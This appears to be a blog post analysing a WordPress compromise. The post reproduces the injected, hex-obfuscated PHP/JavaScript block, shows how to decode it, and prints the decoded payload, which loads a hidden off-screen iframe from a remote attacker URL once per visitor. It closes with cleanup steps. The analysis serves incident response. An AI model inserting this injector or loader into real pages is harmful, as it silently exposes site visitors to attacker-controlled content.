WordPress Hack

Recently a customer’s site was hacked via an out-of-date plugin. The hack was pretty cool and took me a few hours to decipher.

The hack entailed inserting the following PHP code into the header of each file that contained the body tag:

<?php#a9a007#                                                                                                                                                                                                                                                          if(empty($rixmc)) {$rixmc = "<script type=\"text/javascript\" language=\"javascript\">nvbbm=\"fr\"+\"omCh\"+\"ar\"+\"Co\"+\"de\";if(document.querySelector)wtesq=4;iymigs=(\"5e,a4,b3,ac,a1,b2,a7,ad,ac,5e,9f,aa,a5,aa,6e,77,66,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b2,a7,a1,7b,65,9f,a8,9f,b6,65,79,4b,48,5e,b4,9f,b0,5e,a1,ad,ac,b2,b0,ad,aa,aa,a3,b0,7b,65,a7,ac,a2,a3,b6,6c,ae,a6,ae,65,79,4b,48,5e,b4,9f,b0,5e,9f,aa,a5,aa,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,b0,a3,9f,b2,a3,83,aa,a3,ab,a3,ac,b2,66,65,a7,a4,b0,9f,ab,a3,65,67,79,4b,48,4b,48,5e,9f,aa,a5,aa,6c,b1,b0,a1,5e,7b,5e,65,a6,b2,b2,ae,78,6d,6d,b5,b5,b5,6c,ac,a3,b5,b2,a3,a1,a6,a7,ac,a4,ad,b0,ab,9f,b2,a7,a1,9f,6c,a7,b2,6d,84,a8,94,95,85,a6,a5,b0,6c,ae,a6,ae,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,ae,ad,b1,a7,b2,a7,ad,ac,5e,7b,5e,65,9f,a0,b1,ad,aa,b3,b2,a3,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,a1,ad,aa,ad,b0,5e,7b,5e,65,77,76,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,a6,a3,a7,a5,a6,b2,5e,7b,5e,65,77,76,ae,b6,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,b5,a7,a2,b2,a6,5e,7b,5e,65,77,76,ae,b6,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,aa,a3,a4,b2,5e,7b,5e,65,6f,6e,6e,6e,77,76,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,b2,ad,ae,5e,7b,5e,65,6f,6e,6e,6e,77,76,65,79,4b,48,4b,48,5e,a7,a4,5e,66,5f,a2,ad,a1,b3,ab,a3,ac,b2,6c,a5,a3,b2,83,aa,a3,ab,a3,ac,b2,80,b7,87,a2,66,65,9f,aa,a5,aa,65,67,67,5e,b9,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,b5,b0,a7,b2,a3,66,65,7a,ae,5e,a7,a2,7b,9a,65,9f,aa,a5,aa,9a,65,5e,a1,aa,9f,b1,b1,7b,9a,65,9f,aa,a5,aa,6e,77,9a,65,5e,7c,7a,6d,ae,7c,65,67,79,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a5,a3,b2,83,aa,a3,ab,a3,ac,b2,80,b7,87,a2,66,65,9f,aa,a5,aa,65,67,6c,9f,ae,ae,a3,ac,a2,81,a6,a7,aa,a2,66,9f,aa,a5,aa,67,79,4b,48,5
e,bb,4b,48,bb,4b,48,a4,b3,ac,a1,b2,a7,ad,ac,5e,91,a3,b2,81,ad,ad,a9,a7,a3,66,a1,ad,ad,a9,a7,a3,8c,9f,ab,a3,6a,a1,ad,ad,a9,a7,a3,94,9f,aa,b3,a3,6a,ac,82,9f,b7,b1,6a,ae,9f,b2,a6,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b2,ad,a2,9f,b7,5e,7b,5e,ac,a3,b5,5e,82,9f,b2,a3,66,67,79,4b,48,5e,b4,9f,b0,5e,a3,b6,ae,a7,b0,a3,5e,7b,5e,ac,a3,b5,5e,82,9f,b2,a3,66,67,79,4b,48,5e,a7,a4,5e,66,ac,82,9f,b7,b1,7b,7b,ac,b3,aa,aa,5e,ba,ba,5e,ac,82,9f,b7,b1,7b,7b,6e,67,5e,ac,82,9f,b7,b1,7b,6f,79,4b,48,5e,a3,b6,ae,a7,b0,a3,6c,b1,a3,b2,92,a7,ab,a3,66,b2,ad,a2,9f,b7,6c,a5,a3,b2,92,a7,ab,a3,66,67,5e,69,5e,71,74,6e,6e,6e,6e,6e,68,70,72,68,ac,82,9f,b7,b1,67,79,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,5e,7b,5e,a1,ad,ad,a9,a7,a3,8c,9f,ab,a3,69,60,7b,60,69,a3,b1,a1,9f,ae,a3,66,a1,ad,ad,a9,a7,a3,94,9f,aa,b3,a3,67,4b,48,5e,69,5e,60,79,a3,b6,ae,a7,b0,a3,b1,7b,60,5e,69,5e,a3,b6,ae,a7,b0,a3,6c,b2,ad,85,8b,92,91,b2,b0,a7,ac,a5,66,67,5e,69,5e,66,66,ae,9f,b2,a6,67,5e,7d,5e,60,79,5e,ae,9f,b2,a6,7b,60,5e,69,5e,ae,9f,b2,a6,5e,78,5e,60,60,67,79,4b,48,bb,4b,48,a4,b3,ac,a1,b2,a7,ad,ac,5e,85,a3,b2,81,ad,ad,a9,a7,a3,66,5e,ac,9f,ab,a3,5e,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b0,b2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,a7,ac,a2,a3,b6,8d,a4,66,5e,ac,9f,ab,a3,5e,69,5e,60,7b,60,5e,67,79,4b,48,5e,b4,9f,b0,5e,aa,a3,ac,5e,7b,5e,b1,b2,9f,b0,b2,5e,69,5e,ac,9f,ab,a3,6c,aa,a3,ac,a5,b2,a6,5e,69,5e,6f,79,4b,48,5e,a7,a4,5e,66,5e,66,5e,5f,b1,b2,9f,b0,b2,5e,67,5e,64,64,4b,48,5e,66,5e,ac,9f,ab,a3,5e,5f,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,b1,b3,a0,b1,b2,b0,a7,ac,a5,66,5e,6e,6a,5e,ac,9f,ab,a3,6c,aa,a3,ac,a5,b2,a6,5e,67,5e,67,5e,67,4b,48,5e,b9,4b,48,5e,b0,a3,b2,b3,b0,ac,5e,ac,b3,aa,aa,79,4b,48,5e,bb,4b,48,5e,a7,a4,5e,66,5e,b1,b2,9f,b0,b2,5e,7b,7b,5e,6b,6f,5e,67,5e,b0,a3,b2,b3,b0,ac,5e,ac,b3,aa,aa,79,4b,48,5e,b4,9f,b0,5e,a3,ac,a2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,a7,ac,a2,a3,b6,8d,a4,66,5e,60,79,60,6a,5e,aa,a3,ac,5e,67,79,4b,48,5e,a7,a4,5e,66,5e,a3,ac,a2,5e,7b,7b,5e,6b,6f,5e,
67,5e,a3,ac,a2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,aa,a3,ac,a5,b2,a6,79,4b,48,5e,b0,a3,b2,b3,b0,ac,5e,b3,ac,a3,b1,a1,9f,ae,a3,66,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,b1,b3,a0,b1,b2,b0,a7,ac,a5,66,5e,aa,a3,ac,6a,5e,a3,ac,a2,5e,67,5e,67,79,4b,48,bb,4b,48,a7,a4,5e,66,ac,9f,b4,a7,a5,9f,b2,ad,b0,6c,a1,ad,ad,a9,a7,a3,83,ac,9f,a0,aa,a3,a2,67,4b,48,b9,4b,48,a7,a4,66,85,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,67,7b,7b,73,73,67,b9,bb,a3,aa,b1,a3,b9,91,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,6a,5e,65,73,73,65,6a,5e,65,6f,65,6a,5e,65,6d,65,67,79,4b,48,4b,48,9f,aa,a5,aa,6e,77,66,67,79,4b,48,bb,4b,48,bb\".split(\",\"));lldu=window[\"asdeval\".substr(3)];function kwstn(){uvt=function(){--(crq.body)}()}crq=document;for(atodfh=0;atodfh<iymigs[\"length\"];atodfh+=1){iymigs[atodfh]=-(62)+parseInt(iymigs[atodfh],wtesq*4);}try{kwstn()}catch(hno){kqxto=50-50;}if(!kqxto)lldu(String[nvbbm].apply(String,iymigs));</script>";echo $rixmc;}#/a9a007#?>

This code then creates an iframe which links to another PHP file.

As you can see, the code is heavily obfuscated to evade detection; however, thanks to StopBadware.org, it was logged and an alert was raised.

The code below works by using two functions:

1) -(62)+parseInt(iymigs[atodfh],wtesq*4). As you can see in the injected code, wtesq is set to 4 (only when document.querySelector exists, so the decoder silently does nothing in an environment that lacks it), so this becomes -(62)+parseInt(iymigs[atodfh], 16). This gets JavaScript to convert each of the comma-separated string values from radix 16 and subtract 62. Here’s some PHP to do this:

<?php
 
// Decoder for the comma-free hex payload: every two hex digits become one
// radix-16 integer from which 62 is subtracted, mirroring the loop in the
// injected script. Prints the resulting character codes separated by ", ".
$str = "%the string with commas removed%";
 
foreach (str_split($str, 2) as $pair) {
    printf("%d, ", intval($pair, 16) - 62);
}
 
?>

2) Cleverly hidden in \”fr\”+\”omCh\”+\”ar\”+\”Co\”+\”de\” is “fromCharCode”, so the decoded values can be inserted into this online tool (in the injected code the resulting string is then handed to window[“asdeval”.substr(3)], i.e. eval, which executes it):

http://jdstiles.com/java/cct.html

which then gives us the following code:

// Payload stage: creates a tiny (98x98px) iframe, positions it far outside the
// viewport (left/top 100098) and loads the remote attacker page into it, so the
// visitor's browser fetches that page with nothing visible on screen.
function algl09() {
 var static='ajax';          // never read
 var controller='index.php'; // never read
 var algl = document.createElement('iframe');
 
 // Remote second stage; the hostname below is the indicator to block and search for.
 algl.src = 'http://www.newtechinformatica.it/FjVWGhgr.php';
 algl.style.position = 'absolute';
 algl.style.color = '98';    // not a valid CSS colour; no visible effect
 algl.style.height = '98px';
 algl.style.width = '98px';
 algl.style.left = '100098'; // unitless, but the intent is clearly off-screen
 algl.style.top = '100098';
 
 // Inject only once per document: write a <p id="algl"> container with
 // document.write and attach the iframe to it.
 if (!document.getElementById('algl')) {
 document.write('<p id=\'algl\' class=\'algl09\' ></p>');
 document.getElementById('algl').appendChild(algl);
 }
}
// Writes cookieName=cookieValue, expiring nDays from now (defaults to 1 when
// nDays is null or 0), optionally scoped to path. The gate at the bottom of
// the listing uses it so the iframe is injected at most once per visitor per day.
function SetCookie(cookieName,cookieValue,nDays,path) {
 var today = new Date();
 var expire = new Date();
 if (nDays==null || nDays==0) nDays=1;   // loose == also catches undefined
 expire.setTime(today.getTime() + 3600000*24*nDays);  // ms per hour * 24 * days
 // escape() is the legacy encoder; GetCookie reverses it with unescape().
 document.cookie = cookieName+"="+escape(cookieValue)
 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
// Returns the value of cookie `name` from document.cookie, or null if absent.
// Matching is a plain indexOf on name+"=", so a cookie whose name merely ends
// with `name` would also match.
function GetCookie( name ) {
 var start = document.cookie.indexOf( name + "=" );
 var len = start + name.length + 1;   // index just past the '='
 // Dead branch: when start is 0 the cookie string begins with name+"=",
 // so the substring comparison below can never fail.
 if ( ( !start ) &&
 ( name != document.cookie.substring( 0, name.length ) ) )
 {
 return null;
 }
 if ( start == -1 ) return null;   // cookie not present
 var end = document.cookie.indexOf( ";", len );
 if ( end == -1 ) end = document.cookie.length;  // last cookie: value runs to the end
 return unescape( document.cookie.substring( len, end ) );
}
// Trigger gate: with cookies enabled, inject the iframe only if the visitor
// has no 'visited_uq' cookie yet, then set it for one day so the payload
// fires once per visitor. With cookies disabled nothing runs at all. To
// reproduce the injection while investigating, delete the visited_uq cookie first.
if (navigator.cookieEnabled)
{
// GetCookie returns the string '55'; loose == makes it equal the number 55.
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
 
algl09();
}
}

To clean up the exploit, remove this code from header.php in WordPress and also delete any HTML/PHP files in the root directory that the attacker has created; since the entry point was an out-of-date plugin, update that plugin as well so the site is not simply re-infected.

 
